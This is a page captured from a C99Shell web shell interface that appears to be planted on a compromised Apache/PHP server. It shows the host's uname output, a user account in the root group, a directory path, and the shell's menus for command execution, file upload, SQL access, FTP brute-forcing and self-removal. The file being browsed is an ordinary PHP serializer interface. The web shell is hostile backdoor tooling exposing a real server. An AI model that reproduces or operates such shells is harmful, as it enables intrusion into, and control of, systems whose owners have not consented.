!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/league/fractal/src/Serializer/   drwxr-xr-x
Free 28.4 GB of 117.98 GB (24.07%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Serializer.php (1.71 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
namespace League\Fractal\Serializer;

use 
League\Fractal\Pagination\CursorInterface;
use 
League\Fractal\Pagination\PaginatorInterface;
use 
League\Fractal\Resource\ResourceInterface;

interface 
Serializer
{
    
/**
     * Serialize a collection.
     */
    
public function collection(?string $resourceKey, array $data): array;

    
/**
     * Serialize an item.
     */
    
public function item(?string $resourceKey, array $data): array;

    
/**
     * Serialize null resource.
     */
    
public function null(): ?array;

    
/**
     * Serialize the included data.
     */
    
public function includedData(ResourceInterface $resource, array $data): array;

    
/**
     * Serialize the meta.
     */
    
public function meta(array $meta): array;

    
/**
     * Serialize the paginator.
     */
    
public function paginator(PaginatorInterface $paginator): array;

    
/**
     * Serialize the cursor.
     */
    
public function cursor(CursorInterface $cursor): array;

    public function 
mergeIncludes(array $transformedData, array $includedData): array;

    public function 
injectAvailableIncludeData(array $data, array $availableIncludes): array;

    
/**
     * Indicates if includes should be side-loaded.
     */
    
public function sideloadIncludes(): bool;

    
/**
     * Hook for the serializer to inject custom data based on the relationships of the resource.
     */
    
public function injectData(array $data, array $rawIncludedData): array;

    
/**
     * Hook for the serializer to modify the final list of includes.
     */
    
public function filterIncludes(array $includedData, array $data): array;

    
/**
     * Get the mandatory fields for the serializer
     */
    
public function getMandatoryFields(): array;
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--